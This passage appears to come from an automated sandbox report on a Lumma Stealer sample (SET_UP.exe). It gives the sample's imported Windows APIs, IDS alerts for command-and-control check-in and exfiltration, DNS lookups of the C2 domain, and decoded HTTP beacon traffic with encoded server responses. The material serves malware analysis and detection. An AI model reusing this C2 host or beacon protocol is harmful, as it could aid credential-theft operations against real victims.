GetMenuState, SetMenu, SetRect, GetKeyState, FindWindowExW, MonitorFromPoint, SystemParametersInfoW, LoadIconW, GetCursor, GetWindow, GetWindowLongW, GetWindowRect, InsertMenuW, KillTimer, WaitMessage, IsWindowEnabled, IsDialogMessageA, TranslateMDISysAccel, GetWindowPlacement, FindWindowW, DeleteMenu, GetKeyboardLayout
version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll | SafeArrayPutElement, LoadTypeLib, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, SafeArrayCreate, SafeArrayGetElement, GetActiveObject, SysAllocStringLen, SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, RegisterTypeLib, VariantChangeType, VariantCopyInd
advapi32.dll | RegSetValueExW, RegEnumKeyExW, AdjustTokenPrivileges, OpenThreadToken, GetUserNameW, RegDeleteKeyW, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegQueryInfoKeyW, AllocateAndInitializeSid, FreeSid, EqualSid, RegDeleteValueW, RegFlushKey, RegQueryValueExW, RegEnumValueW, GetTokenInformation, InitializeSecurityDescriptor, RegCloseKey, RegCreateKeyExW, SetSecurityDescriptorDacl
netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
msvcrt.dll | memcpy
winhttp.dll | WinHttpGetIEProxyConfigForCurrentUser, WinHttpSetTimeouts, WinHttpSetStatusCallback, WinHttpConnect, WinHttpReceiveResponse, WinHttpQueryAuthSchemes, WinHttpGetProxyForUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpQueryHeaders, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpOpen, WinHttpWriteData, WinHttpSetCredentials, WinHttpQueryDataAvailable, WinHttpSetOption, WinHttpSendRequest, WinHttpQueryOption
kernel32.dll | SetFileAttributesW, SetFileTime, GetACP, GetExitCodeProcess, IsBadWritePtr, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, VirtualProtect, TerminateThread, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, HeapAlloc, ExitProcess, WriteProfileStringW, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, HeapDestroy, CompareFileTime, ReadFile, CreateProcessW, TransactNamedPipe, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, OpenMutexW, CreateThread, CompareStringW, CopyFileW, CreateMutexW, LoadLibraryA, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, MoveFileW, GlobalAddAtomW, GetSystemTimeAsFileTime, FormatMessageW, OpenProcess, SwitchToThread, GetExitCodeThread, OutputDebugStringW, GetCurrentThread, GetLogicalDrives, LocalFileTimeToFileTime, SetNamedPipeHandleState, LoadLibraryExW, TerminateProcess, LockResource, FileTimeToSystemTime, GetShortPathNameW, GetCurrentThreadId, UnhandledExceptionFilter, MoveFileExW, GlobalFindAtomW, VirtualQuery, GlobalFree, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, ReleaseMutex, FlushFileBuffers, LoadResource, SuspendThread, GetTickCount, WritePrivateProfileStringW, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, GetCurrentDirectoryW, SetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, DeviceIoControl, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, lstrcmpW, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateNamedPipeW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetOverlappedResult, GetSystemDefaultUILanguage, EnumCalendarInfoW, GetProfileStringW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, IsDBCSLeadByte, CreateEventW, GetPrivateProfileStringW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
ole32.dll | StgCreateDocfileOnILockBytes, CoCreateInstance, CLSIDFromString, CoUninitialize, IsEqualGUID, OleInitialize, CoFreeUnusedLibraries, CreateILockBytesOnHGlobal, CLSIDFromProgID, OleUninitialize, CoDisconnectObject, CoInitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
gdi32.dll | Arc, Pie, SetBkMode, SelectPalette, CreateCompatibleBitmap, ExcludeClipRect, RectVisible, SetWindowOrgEx, MaskBlt, AngleArc, Chord, SetTextColor, StretchBlt, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, RoundRect, RestoreDC, SetRectRgn, GetTextMetricsW, RemoveFontResourceW, GetWindowOrgEx, CreatePalette, CreateBrushIndirect, PatBlt, LineDDA, PolyBezierTo, GetStockObject, CreateSolidBrush, Polygon, Rectangle, MoveToEx, DeleteDC, SaveDC, BitBlt, Ellipse, FrameRgn, GetDeviceCaps, GetBitmapBits, GetTextExtentPoint32W, GetClipBox, Polyline, IntersectClipRect, GetSystemPaletteEntries, CreateBitmap, AddFontResourceW, CreateDIBitmap, GetStretchBltMode, CreateDIBSection, CreatePenIndirect, SetStretchBltMode, GetDIBits, CreateFontIndirectW, PolyBezier, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, DeleteObject, SelectObject, ExtFloodFill, UnrealizeObject, SetBkColor, CreateCompatibleDC, GetObjectW, GetBrushOrgEx, GetCurrentPositionEx, SetROP2, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, ArcTo, GdiFlush, SetPixel, EnumFontFamiliesExW, GetPaletteEntries
Name | Ordinal | Address
TMethodImplementationIntercept | 3 | 0x4b5e58
__dbk_fcall_wrapper | 2 | 0x410a7c
dbkFCallWrapperAddr | 1 | 0x6d1640
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-06T15:15:08.513880+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:09.034284+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49748 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:09.034284+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49748 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:09.515438+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49749 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:10.005978+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49749 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:10.005978+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49749 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:10.634900+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49750 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:12.133029+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49751 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:13.372746+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:14.676572+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49753 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:15.492390+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49753 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:16.067101+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49754 | 188.114.97.3 | 443 | TCP
2025-01-06T15:15:23.991606+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49756 | 188.114.97.3 | 443 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 15:15:08.003470898 CET | 192.168.2.4 | 1.1.1.1 | 0x50d6 | Standard query (0) | glowscarrytsv.sbs | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:15:31.061511993 CET | 192.168.2.4 | 1.1.1.1 | 0x842a | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 15:15:08.015584946 CET | 1.1.1.1 | 192.168.2.4 | 0x50d6 | No error (0) | glowscarrytsv.sbs | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:15:08.015584946 CET | 1.1.1.1 | 192.168.2.4 | 0x50d6 | No error (0) | glowscarrytsv.sbs | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 15:15:31.070869923 CET | 1.1.1.1 | 192.168.2.4 | 0x842a | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                                                                                • glowscarrytsv.sbs
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49748 | 188.114.97.3 | 443 | 7620 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:15:08 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 8
                                                                                                Host: glowscarrytsv.sbs
2025-01-06 14:15:08 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-06 14:15:09 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=egltn4epsrf6mcasofn71pe3ia; expires=Fri, 02 May 2025 08:01:47 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZHpcxLTjVNJcR1kDekLADRt94OnJLMLsh5MyMjAOLzAJXJXDDIDbiICRQ%2Bpg0ADSnzlvBVTbG3fXVlQ7s%2FaXrNKeTdkA4PE2K5oe1qEyfheSLMvmQtYI5PlzWGdIYNG5q9iOJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc5187293b42ef-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1783&rtt_var=672&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1624026&cwnd=221&unsent_bytes=0&cid=51f212e02f8dc92f&ts=532&x=0"
2025-01-06 14:15:09 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-06 14:15:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49749 | 188.114.97.3 | 443 | 7620 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-06 14:15:09 UTC | 265 | OUT | POST /api HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                Content-Length: 80
                                                                                                Host: glowscarrytsv.sbs
2025-01-06 14:15:09 UTC | 80 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d
2025-01-06 14:15:10 UTC | 1127 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 06 Jan 2025 14:15:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=uqjokaala4ibe7n6g6e1sr3r0e; expires=Fri, 02 May 2025 08:01:48 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99R5E9fw6skwyPIFMI1JYqHAf7zXQaI76gGJwGfVscepsMbzGkiS29kZHE19KQjvfPxyE%2FE3cakbMXSwqhypPNkLko6dq34nwQCJp2kGArELHbRhHCWD6OHVh89i%2F6nN4I6fRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc518d0cf672b9-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1845&min_rtt=1841&rtt_var=698&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=981&delivery_rate=1558164&cwnd=214&unsent_bytes=0&cid=25f05bd801a1f34a&ts=497&x=0"
                                                                                                2025-01-06 14:15:10 UTC242INData Raw: 33 61 38 38 0d 0a 5a 42 76 53 44 58 77 48 4d 41 31 69 74 78 4c 63 46 2b 53 4d 47 4b 69 70 79 68 61 75 71 57 44 46 4e 44 45 37 42 68 6e 67 66 67 67 66 4f 61 51 76 52 6a 4d 63 4c 78 48 53 4d 4f 5a 78 68 65 42 72 7a 59 58 6f 64 38 71 4c 57 71 4e 56 58 55 68 6a 4e 63 49 49 5a 55 59 68 74 47 77 51 64 46 55 68 51 4e 4a 71 2f 69 32 2f 39 7a 72 4e 78 2b 67 73 6a 4d 77 4b 70 31 56 64 57 57 64 79 6a 77 35 6b 42 33 4f 2b 61 68 52 69 55 32 6b 44 32 33 2b 35 63 6f 48 74 63 73 62 41 70 33 37 44 69 30 7a 6e 55 55 73 5a 50 44 75 74 47 33 77 46 56 72 4e 2b 46 79 56 4e 49 52 6d 56 64 37 49 31 33 71 35 35 7a 63 75 6d 63 4d 72 43 43 4b 31 63 56 56 68 69 63 35 41 58 62 67 78 7a 73 47 6b 56 61 46 70 39 44 74 46 34 73 6e 53 4c 37 54 71 45
                                                                                                Data Ascii: 3a88ZBvSDXwHMA1itxLcF+SMGKipyhauqWDFNDE7BhngfggfOaQvRjMcLxHSMOZxheBrzYXod8qLWqNVXUhjNcIIZUYhtGwQdFUhQNJq/i2/9zrNx+gsjMwKp1VdWWdyjw5kB3O+ahRiU2kD23+5coHtcsbAp37Di0znUUsZPDutG3wFVrN+FyVNIRmVd7I13q55zcumcMrCCK1cVVhic5AXbgxzsGkVaFp9DtF4snSL7TqE
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 69 36 39 73 6a 4a 4e 43 39 47 52 51 53 48 56 75 6a 77 78 73 52 6d 62 2b 64 6c 35 69 58 69 39 59 6c 58 69 79 65 34 50 74 64 63 33 4b 71 47 62 44 79 77 47 76 58 6c 64 54 61 33 53 4e 45 6d 41 42 63 62 6c 6f 45 57 4a 61 61 51 2f 57 4d 50 41 31 67 66 59 36 6b 6f 75 49 5a 4d 2f 49 46 71 70 48 45 30 59 71 59 73 49 62 5a 6b 59 68 38 47 6b 51 5a 46 39 76 45 74 31 37 74 58 43 55 35 58 50 48 78 71 68 35 78 73 51 42 70 31 46 5a 55 32 74 78 68 68 46 6e 41 48 6d 77 4c 31 41 6c 56 58 64 41 6a 54 43 64 63 4a 62 70 64 74 79 4a 6b 6a 54 54 68 52 76 6e 55 56 38 5a 50 44 75 4b 47 57 6b 46 63 72 39 73 46 6d 35 41 62 78 4c 54 66 62 74 6e 67 4f 74 30 77 4d 69 36 66 73 4c 4e 41 61 35 64 57 6c 78 6a 66 38 4a 53 4b 67 46 68 38 44 64 65 52 46 39 6b 44 4e 39 6e 76 6a 57 5a 6f 47 4f
                                                                                                Data Ascii: i69sjJNC9GRQSHVujwxsRmb+dl5iXi9YlXiye4Ptdc3KqGbDywGvXldTa3SNEmABcbloEWJaaQ/WMPA1gfY6kouIZM/IFqpHE0YqYsIbZkYh8GkQZF9vEt17tXCU5XPHxqh5xsQBp1FZU2txhhFnAHmwL1AlVXdAjTCdcJbpdtyJkjTThRvnUV8ZPDuKGWkFcr9sFm5AbxLTfbtngOt0wMi6fsLNAa5dWlxjf8JSKgFh8DdeRF9kDN9nvjWZoGO
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 4d 62 4e 44 61 70 61 45 78 63 6b 66 4a 70 63 4d 6b 5a 54 73 33 73 64 62 78 42 61 41 39 74 2b 75 57 50 47 38 54 54 54 69 36 39 34 6a 4a 4e 43 71 6c 64 62 58 33 5a 30 6a 78 39 6b 43 48 61 31 59 42 5a 6c 55 6d 49 46 30 58 75 31 64 6f 76 71 61 4d 44 4c 6f 48 48 4e 77 51 6a 6e 47 42 4e 65 66 44 76 61 58 46 73 52 63 76 4a 61 48 57 74 63 61 42 61 56 62 2f 42 73 78 75 6c 32 69 70 50 6f 65 63 54 4f 42 36 68 58 57 56 64 68 63 59 34 55 5a 41 56 72 76 32 73 65 61 56 70 6c 44 64 74 30 74 6e 79 4e 35 58 7a 4b 79 71 49 30 67 6f 73 46 76 78 59 4c 47 56 42 38 6a 68 46 6c 52 45 79 7a 59 52 42 69 52 43 38 66 6d 32 6e 2b 63 6f 71 75 49 6f 72 48 6f 58 54 48 77 51 61 6e 55 56 35 63 5a 33 79 42 45 57 30 4d 64 37 64 72 45 6d 78 66 61 51 44 53 64 4c 74 6e 67 2b 64 32 78 6f 76 6d
                                                                                                Data Ascii: MbNDapaExckfJpcMkZTs3sdbxBaA9t+uWPG8TTTi694jJNCqldbX3Z0jx9kCHa1YBZlUmIF0Xu1dovqaMDLoHHNwQjnGBNefDvaXFsRcvJaHWtcaBaVb/Bsxul2ipPoecTOB6hXWVdhcY4UZAVrv2seaVplDdt0tnyN5XzKyqI0gosFvxYLGVB8jhFlREyzYRBiRC8fm2n+coquIorHoXTHwQanUV5cZ3yBEW0Md7drEmxfaQDSdLtng+d2xovm
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 33 70 54 78 4e 65 61 44 76 61 58 47 4d 50 61 37 35 68 46 32 68 55 5a 77 66 62 66 62 56 7a 6a 65 6c 39 7a 4d 61 67 65 63 6e 49 41 36 4e 63 51 56 70 76 63 59 38 57 4b 6b 67 35 74 33 64 65 50 52 4a 49 44 50 78 67 70 57 65 51 72 6d 57 45 30 75 68 7a 77 49 74 61 35 31 56 63 55 47 74 7a 69 68 4e 6c 41 6e 65 32 61 52 4e 67 58 57 55 53 33 58 36 7a 66 6f 6e 6c 61 4d 72 47 72 48 6a 49 77 77 6d 74 46 68 30 5a 59 32 50 43 52 43 6f 7a 64 4c 39 76 48 58 4d 53 63 45 37 4d 4d 4c 6c 35 78 72 59 36 78 73 57 6f 65 38 44 48 43 61 39 58 58 31 64 6a 66 6f 73 55 59 68 52 34 74 47 63 66 61 31 31 75 42 4e 42 31 75 6e 4b 43 36 48 57 4b 68 65 68 7a 31 49 74 61 35 33 6c 30 62 43 5a 61 75 46 78 31 53 47 44 77 61 42 49 6c 43 69 38 4d 31 6e 79 32 65 6f 44 6e 64 73 44 43 6f 33 6a 48 7a
                                                                                                Data Ascii: 3pTxNeaDvaXGMPa75hF2hUZwfbfbVzjel9zMagecnIA6NcQVpvcY8WKkg5t3dePRJIDPxgpWeQrmWE0uhzwIta51VcUGtzihNlAne2aRNgXWUS3X6zfonlaMrGrHjIwwmtFh0ZY2PCRCozdL9vHXMScE7MMLl5xrY6xsWoe8DHCa9XX1djfosUYhR4tGcfa11uBNB1unKC6HWKhehz1Ita53l0bCZauFx1SGDwaBIlCi8M1ny2eoDndsDCo3jHz
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 57 56 6d 56 36 68 41 35 74 44 32 75 2b 59 68 46 74 57 6d 59 42 30 58 57 7a 63 34 72 6b 65 38 33 46 70 6e 79 4d 68 55 4b 67 54 68 4d 42 4a 46 71 53 42 33 67 51 64 4a 46 69 45 53 56 4e 49 52 6d 56 64 37 49 31 33 71 35 7a 32 4d 2b 6c 5a 73 58 4d 44 4b 68 56 51 56 68 70 63 4a 41 62 5a 51 4a 2b 76 47 6b 52 59 31 4e 71 43 74 6c 33 75 33 36 4a 34 6a 71 45 69 36 39 73 6a 4a 4e 43 69 56 31 41 54 6d 64 31 69 51 70 78 52 6d 62 2b 64 6c 35 69 58 69 39 59 6c 58 4f 31 66 6f 4c 75 64 73 72 50 70 58 54 65 78 41 57 67 58 31 68 4c 62 6e 79 46 46 32 49 4e 64 72 5a 39 45 6d 74 41 61 68 4c 48 4d 50 41 31 67 66 59 36 6b 6f 75 65 63 39 7a 62 41 65 56 6e 52 56 70 79 63 49 38 51 4b 68 6b 33 71 53 38 5a 61 52 49 33 51 4e 4e 2f 74 33 61 4a 37 33 50 47 78 71 31 39 79 63 6f 45 6f 31
                                                                                                Data Ascii: WVmV6hA5tD2u+YhFtWmYB0XWzc4rke83FpnyMhUKgThMBJFqSB3gQdJFiESVNIRmVd7I13q5z2M+lZsXMDKhVQVhpcJAbZQJ+vGkRY1NqCtl3u36J4jqEi69sjJNCiV1ATmd1iQpxRmb+dl5iXi9YlXO1foLudsrPpXTexAWgX1hLbnyFF2INdrZ9EmtAahLHMPA1gfY6kouec9zbAeVnRVpycI8QKhk3qS8ZaRI3QNN/t3aJ73PGxq19ycoEo1
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 59 4d 49 44 4a 42 38 35 74 32 4e 65 50 52 4a 73 42 39 5a 78 74 48 79 4b 34 58 33 4f 32 61 4a 7a 33 73 6f 44 72 46 74 66 57 57 6c 32 69 42 31 6a 43 33 57 39 61 42 6c 71 56 79 39 4f 6c 58 65 6d 4e 64 36 75 57 38 66 41 70 43 2b 57 69 78 33 70 54 78 4e 65 61 44 76 61 58 47 6f 4d 66 4c 70 69 48 57 70 52 66 51 48 54 59 72 35 34 6a 50 78 77 77 63 36 6c 65 63 48 49 42 4b 46 64 58 30 74 74 65 34 45 58 4b 6b 67 35 74 33 64 65 50 52 4a 4d 46 38 4e 36 75 58 6d 51 35 58 76 4a 33 61 56 6b 6a 49 56 43 74 6c 46 43 47 54 78 74 6b 67 74 74 47 54 65 70 4c 78 6c 70 45 6a 64 41 30 33 6d 34 63 6f 44 67 61 4d 2f 4e 70 33 76 46 77 67 61 76 56 56 4e 64 59 48 79 48 48 32 59 4e 66 72 4e 67 47 6d 78 63 5a 67 2b 56 50 76 35 79 6e 71 34 69 69 75 71 7a 64 38 44 47 51 72 67 59 53 68 6c
                                                                                                Data Ascii: YMIDJB85t2NePRJsB9ZxtHyK4X3O2aJz3soDrFtfWWl2iB1jC3W9aBlqVy9OlXemNd6uW8fApC+Wix3pTxNeaDvaXGoMfLpiHWpRfQHTYr54jPxwwc6lecHIBKFdX0tte4EXKkg5t3dePRJMF8N6uXmQ5XvJ3aVkjIVCtlFCGTxtkgttGTepLxlpEjdA03m4coDgaM/Np3vFwgavVVNdYHyHH2YNfrNgGmxcZg+VPv5ynq4iiuqzd8DGQrgYShl
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 33 4a 47 49 66 42 50 46 58 4e 58 61 42 61 58 52 62 31 37 69 4f 6c 73 69 74 53 58 4f 6f 7a 4b 51 76 39 76 53 68 6c 79 4f 39 70 4f 4a 45 5a 72 38 44 64 65 49 6c 46 39 45 74 4e 7a 71 48 62 42 30 45 54 74 33 61 4a 7a 33 4d 77 56 71 42 59 64 47 57 73 37 32 69 55 71 44 33 36 72 66 67 68 6f 51 6d 68 41 36 6a 37 2b 62 63 61 32 4f 76 2f 49 70 6e 72 4c 33 52 50 71 63 55 56 54 59 32 75 46 43 32 56 47 4e 2f 42 70 58 6a 30 42 49 55 44 52 59 66 34 74 31 72 77 68 6e 35 6a 2f 4a 4a 37 55 54 4c 34 57 52 52 6b 38 4b 63 78 63 65 45 59 68 38 43 67 64 64 30 42 70 41 38 4e 7a 2b 55 75 34 79 57 44 48 7a 62 39 6c 38 76 55 46 76 56 74 56 54 6e 55 33 6c 78 39 6b 43 48 36 6d 4c 31 41 6c 58 53 39 59 37 44 44 32 4e 62 6d 67 4f 74 4b 4c 38 44 54 35 79 41 79 70 55 55 56 49 4b 56 79 59
                                                                                                Data Ascii: 3JGIfBPFXNXaBaXRb17iOlsitSXOozKQv9vShlyO9pOJEZr8DdeIlF9EtNzqHbB0ETt3aJz3MwVqBYdGWs72iUqD36rfghoQmhA6j7+bca2Ov/IpnrL3RPqcUVTY2uFC2VGN/BpXj0BIUDRYf4t1rwhn5j/JJ7UTL4WRRk8KcxceEYh8Cgdd0BpA8Nz+Uu4yWDHzb9l8vUFvVtVTnU3lx9kCH6mL1AlXS9Y7DD2NbmgOtKL8DT5yAypUUVIKVyY
                                                                                                2025-01-06 14:15:10 UTC1369INData Raw: 6d 69 4c 30 59 6c 46 57 77 53 78 33 61 39 59 34 57 70 52 50 54 73 70 6e 50 4e 33 52 4b 77 57 57 31 6e 63 58 69 4d 45 6d 30 51 61 50 41 68 58 6d 6f 53 4e 7a 6d 56 4f 50 35 4b 79 4b 35 69 69 70 50 6f 51 63 2f 46 44 4b 42 41 51 68 52 44 64 59 55 64 66 42 5a 75 76 79 39 51 4a 56 51 76 57 49 63 2b 2f 6e 47 58 72 69 4b 61 6d 66 4d 68 6e 35 78 53 39 55 6b 64 51 43 52 74 77 6b 51 34 53 44 6d 69 4c 30 59 6c 46 57 77 53 78 33 61 39 59 34 57 70 52 50 54 73 70 6e 50 4e 33 52 4b 77 57 52 78 33 55 6c 71 38 49 6e 38 46 64 37 35 6f 43 48 51 53 49 55 44 61 4d 4f 5a 4d 78 71 59 36 39 59 58 6f 62 49 79 54 51 70 4a 56 58 56 64 6a 62 5a 4e 52 54 51 68 2b 73 58 6b 4f 63 6c 30 67 4c 75 4e 52 2f 6a 76 47 36 44 71 53 6d 65 59 30 79 4e 70 43 2f 77 59 42 41 6a 45 6f 31 55 77 34 47
                                                                                                Data Ascii: miL0YlFWwSx3a9Y4WpRPTspnPN3RKwWW1ncXiMEm0QaPAhXmoSNzmVOP5KyK5iipPoQc/FDKBAQhRDdYUdfBZuvy9QJVQvWIc+/nGXriKamfMhn5xS9UkdQCRtwkQ4SDmiL0YlFWwSx3a9Y4WpRPTspnPN3RKwWRx3Ulq8In8Fd75oCHQSIUDaMOZMxqY69YXobIyTQpJVXVdjbZNRTQh+sXkOcl0gLuNR/jvG6DqSmeY0yNpC/wYBAjEo1Uw4G
